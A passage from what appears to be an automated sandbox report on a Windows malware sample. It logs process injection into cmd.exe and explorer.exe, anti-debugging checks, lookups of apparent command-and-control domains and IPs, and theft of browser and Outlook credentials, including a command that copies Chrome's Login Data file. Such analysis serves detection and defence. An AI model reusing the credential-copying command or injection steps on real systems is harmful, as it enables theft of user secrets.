Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDAD30 mov eax, dword ptr fs:[00000030h] 5_2_03BDAD30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h] 5_2_03BFC577
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h] 5_2_03BFC577
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF7D50 mov eax, dword ptr fs:[00000030h] 5_2_03BF7D50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9E539 mov eax, dword ptr fs:[00000030h] 5_2_03C9E539
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C5A537 mov eax, dword ptr fs:[00000030h] 5_2_03C5A537
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h] 5_2_03C04D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h] 5_2_03C04D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h] 5_2_03C04D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8D34 mov eax, dword ptr fs:[00000030h] 5_2_03CA8D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8CD6 mov eax, dword ptr fs:[00000030h] 5_2_03CA8CD6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE849B mov eax, dword ptr fs:[00000030h] 5_2_03BE849B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C914FB mov eax, dword ptr fs:[00000030h] 5_2_03C914FB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h] 5_2_03C56CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h] 5_2_03C56CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h] 5_2_03C56CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A44B mov eax, dword ptr fs:[00000030h] 5_2_03C0A44B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h] 5_2_03C6C450
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h] 5_2_03C6C450
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h] 5_2_03CA740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h] 5_2_03CA740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h] 5_2_03CA740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h] 5_2_03C56C0A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF746D mov eax, dword ptr fs:[00000030h] 5_2_03BF746D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0BC2C mov eax, dword ptr fs:[00000030h] 5_2_03C0BC2C
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk, 5_2_03C19A50

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: IconCachet0hh.exe.7.dr
Source: C:\Windows\explorer.exe Domain query: www.gografic.com
Source: C:\Windows\explorer.exe Network Connect: 154.55.180.56 80
Source: C:\Windows\explorer.exe Domain query: www.moneytaoism.com
Source: C:\Windows\explorer.exe Domain query: www.naturathome.info
Source: C:\Windows\explorer.exe Domain query: www.6111.site
Source: C:\Windows\explorer.exe Network Connect: 5.183.8.187 80
Source: C:\Windows\explorer.exe Network Connect: 38.54.163.57 80
Source: C:\Windows\explorer.exe Domain query: www.kidsfundoor.com
Source: C:\Windows\explorer.exe Domain query: www.choonchain.com
Source: C:\Windows\explorer.exe Domain query: www.empireapothecary.com
Source: C:\Windows\explorer.exe Domain query: www.huangse5.com
Source: C:\Windows\explorer.exe Domain query: www.nutricognition.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.218 80
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.158 80
Source: C:\Windows\explorer.exe Domain query: www.trisuaka.xyz
Source: C:\Windows\explorer.exe Domain query: www.trendiddas.com
Source: C:\Windows\explorer.exe Domain query: www.nomaxdic.com
Source: C:\Windows\explorer.exe Network Connect: 188.114.97.3 80
Source: C:\Windows\explorer.exe Network Connect: 156.226.60.131 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.designgamagazine.com
Source: C:\Windows\explorer.exe Domain query: www.shopwithtrooperdavecom.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80
Source: C:\Windows\SysWOW64\cmd.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1080000
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 50410000
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 3430000
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 3440000
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 50410000 protect: page execute and read and write
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3430000 protect: page execute and read and write
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3440000 protect: page execute and read and write
Source: C:\Users\user\Desktop\TR0627729920002.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 50410000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3968
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe
Source: C:\Users\user\Desktop\TR0627729920002.exe Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 3440000
Source: C:\Users\user\Desktop\TR0627729920002.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000007.00000000.350508051.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.281636648.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441279364.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000007.00000000.291986070.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.362079139.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.358486470.0000000005920000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.350564915.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.374071514.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441429603.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY